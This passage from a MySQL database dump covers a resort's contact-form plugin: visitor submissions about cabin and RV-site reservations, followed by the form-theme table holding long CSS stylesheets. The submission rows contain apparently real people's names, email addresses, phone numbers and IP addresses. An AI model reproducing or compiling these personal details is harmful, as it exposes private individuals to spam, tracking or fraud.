01:53:16','208.126.123.111'),(717,10,'22','#9',120,'2017-12-14 01:53:16','208.126.123.111'),(718,10,'23','Hi guys, Is villa #9 available for our week?  If not, do you have #2, 4 or 6 besides the kitchenette we&#039;ve already reserved for Nate?  Am late with Christmas cards this year.  Hope you have a great one and all is well! ',120,'2017-12-14 01:53:16','208.126.123.111'),(719,10,'2','chamberlainbert@gmail.com',121,'2018-01-14 01:03:17','174.217.33.89'),(720,10,'4','chamberlainbert@gmail.com',121,'2018-01-14 01:03:17','174.217.33.89'),(721,10,'7','701 3889586',121,'2018-01-14 01:03:17','174.217.33.89'),(722,10,'24','Other',121,'2018-01-14 01:03:17','174.217.33.89'),(723,10,'22','Seasonal site',121,'2018-01-14 01:03:17','174.217.33.89'),(724,10,'23','Hello, \r\nAre there any seasonal site available for 2018. \r\nThank you, Bert Chamberlain ',121,'2018-01-14 01:03:17','174.217.33.89'),(725,10,'2','Kim Olson',122,'2018-01-15 19:38:08','24.245.33.212'),(726,10,'4','bugs1999@comcast.net',122,'2018-01-15 19:38:08','24.245.33.212'),(727,10,'7','7635465959 ',122,'2018-01-15 19:38:08','24.245.33.212'),(728,10,'24','Existing Reservation',122,'2018-01-15 19:38:08','24.245.33.212'),(729,10,'22','down payment',122,'2018-01-15 19:38:08','24.245.33.212'),(730,10,'23','I am just sending $150 in the mail today. (For Sat. June 23)  Sorry it will be a few days late.',122,'2018-01-15 19:38:08','24.245.33.212'),(731,10,'2','katherine Gustafson',123,'2018-01-16 02:13:56','174.53.142.140'),(732,10,'4','msgus50@msn.com',123,'2018-01-16 02:13:56','174.53.142.140'),(733,10,'7','612 9220275',123,'2018-01-16 02:13:56','174.53.142.140'),(734,10,'24','New Reservation',123,'2018-01-16 02:13:56','174.53.142.140'),(735,10,'22','reservation',123,'2018-01-16 02:13:56','174.53.142.140'),(736,10,'23','We love biking and hope that you can accommodate us for 3 nights in September.\r\nWe have a 35 foot Rv and would like full hookup and 50 amp. But we can make do with 30 amp.\r\nDo you have available space the week of Sept. 10-14. We are flexible with what nights work. Monday to Thursday or Tuesday- Friday.',123,'2018-01-16 02:13:56','174.53.142.140'),(737,10,'2','Ann Hepola',124,'2018-02-01 01:16:48','73.65.59.11'),(738,10,'4','ahepola64@gmail.com',124,'2018-02-01 01:16:48','73.65.59.11'),(739,10,'7','612 2815305',124,'2018-02-01 01:16:48','73.65.59.11'),(740,10,'24','Questions about our resort',124,'2018-02-01 01:16:48','73.65.59.11'),(741,10,'22','Sept 7-9 2018',124,'2018-02-01 01:16:48','73.65.59.11'),(742,10,'23','Hi\r\nWe are having a family reunion in Ashby Sept 7-9.\r\nI am looking for options to put in the invite.\r\nCabins or motel.\r\nWill you send me into on rates, min stay, etc..\r\nThank you\r\nAnn',124,'2018-02-01 01:16:48','73.65.59.11'),(743,10,'2','mike85',125,'2018-02-03 22:54:37','96.39.130.238'),(744,10,'4','Sagrshno4@gmail.com',125,'2018-02-03 22:54:37','96.39.130.238'),(745,10,'7','763 3704285',125,'2018-02-03 22:54:37','96.39.130.238'),(746,10,'24','New Reservation',125,'2018-02-03 22:54:37','96.39.130.238'),(747,10,'22','Availability',125,'2018-02-03 22:54:37','96.39.130.238'),(748,10,'23','Do you have any openings the week of July 4rh',125,'2018-02-03 22:54:37','96.39.130.238'),(749,10,'2','Donna Laleman',126,'2018-02-06 20:25:29','184.94.136.203'),(750,10,'4','lalemd01@yahoo.com',126,'2018-02-06 20:25:29','184.94.136.203'),(751,10,'7','507 4763237',126,'2018-02-06 20:25:29','184.94.136.203'),(752,10,'24','Questions about our resort',126,'2018-02-06 20:25:29','184.94.136.203'),(753,10,'22','question',126,'2018-02-06 20:25:29','184.94.136.203'),(754,10,'23','I am just checking to see if any of your cabins are available the week of June 23 to the 30th. Also would like to have the pontoon for that week as well Please let me know Thank you',126,'2018-02-06 20:25:29','184.94.136.203'),(755,10,'2','Kim Hennigar',127,'2018-02-08 17:02:55','104.145.207.17'),(756,10,'4','hennhouse6@msn.com',127,'2018-02-08 17:02:55','104.145.207.17'),(757,10,'7','641 3900753',127,'2018-02-08 17:02:55','104.145.207.17'),(758,10,'24','Existing Reservation',127,'2018-02-08 17:02:55','104.145.207.17'),(759,10,'22','Moretz week',127,'2018-02-08 17:02:55','104.145.207.17'),(760,10,'23','Good Morning, We are not going to be able to stay all week in July. Should the rooms still be available, we would use them Saturday thru Tuesday. Dealing with some family issues and cant stay the whole week, sorry for any inconvenience, truly sorry. I can send a down payment by early next week. Please let me know if this will work. \r\nThank you. ',127,'2018-02-08 17:02:55','104.145.207.17'),(761,10,'2','Dale Compton',128,'2018-02-10 21:38:05','184.105.50.12'),(762,10,'4','dcompton@usa.com',128,'2018-02-10 21:38:05','184.105.50.12'),(763,10,'7','507 3410062',128,'2018-02-10 21:38:05','184.105.50.12'),(764,10,'24','New Reservation',128,'2018-02-10 21:38:05','184.105.50.12'),(765,10,'22','question',128,'2018-02-10 21:38:05','184.105.50.12'),(766,10,'23','Hello. We are looking for a week to stay this summer. We would like (2) two-bedroom cabins and 1 full hookup RV site. We have my wife, daughter and me in an RV; my Mom and Dad in one cabin; my sister and her family in another cabin; (and possibly my older daughter and her husband in a tent). Do you think you\\\\\\&#039;d be able to accommodate our group at some point this summer? Thanks for your help.',128,'2018-02-10 21:38:05','184.105.50.12'),(767,10,'2','Sohail Bengali',129,'2018-02-15 06:49:46','76.14.8.120'),(768,10,'4','sohailbengali@gmail.com',129,'2018-02-15 06:49:46','76.14.8.120'),(769,10,'7','415 7301456',129,'2018-02-15 06:49:46','76.14.8.120'),(770,10,'24','New Reservation',129,'2018-02-15 06:49:46','76.14.8.120'),(771,10,'22','June 17 - 3 adults - one night',129,'2018-02-15 06:49:46','76.14.8.120'),(772,10,'23','Hello:  would like to reserve a cabin/villa for one night on June 17.  3 adults on a bike ride across the west.  Ideally, New cabin 13 or 14. Or Lakeside villa 9. Or Two sleepers.  Please call.\r\nThanks very much.  Sohail',129,'2018-02-15 06:49:46','76.14.8.120'),(773,10,'2','Laken Beeler-Kerestes',130,'2018-02-21 20:37:02','24.196.61.146'),(774,10,'4','beelerL@msn.com',130,'2018-02-21 20:37:02','24.196.61.146'),(775,10,'7','320 7614990',130,'2018-02-21 20:37:02','24.196.61.146'),(776,10,'24','Questions about our resort',130,'2018-02-21 20:37:02','24.196.61.146'),(777,10,'22','Reservation Inquiry',130,'2018-02-21 20:37:02','24.196.61.146'),(778,10,'23','What do you have available for tent sites June 1st-3rd?',130,'2018-02-21 20:37:02','24.196.61.146');
/*!40000 ALTER TABLE `ar_contactformmaker_submits` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_contactformmaker_themes`
--

DROP TABLE IF EXISTS `ar_contactformmaker_themes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_contactformmaker_themes` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(200) NOT NULL,
  `css` text NOT NULL,
  `default` tinyint(4) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=38 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_contactformmaker_themes`
--

LOCK TABLES `ar_contactformmaker_themes` WRITE;
/*!40000 ALTER TABLE `ar_contactformmaker_themes` DISABLE KEYS */;
INSERT INTO `ar_contactformmaker_themes` VALUES (1,'Theme 01 blue','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #013D7C;\r\nborder-radius: 5px;\r\ncolor: #013D7C;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type=\"radio\"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type=\"checkbox\"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/01/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #013D7C;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #013D7C;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #013D7C;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #013E7D;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #013E7D;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #013E7F;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(2,'Theme 01 purple','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #6C005E;\r\nborder-radius: 5px;\r\ncolor: #6C005E;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type=\"radio\"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type=\"checkbox\"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #6C005E;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	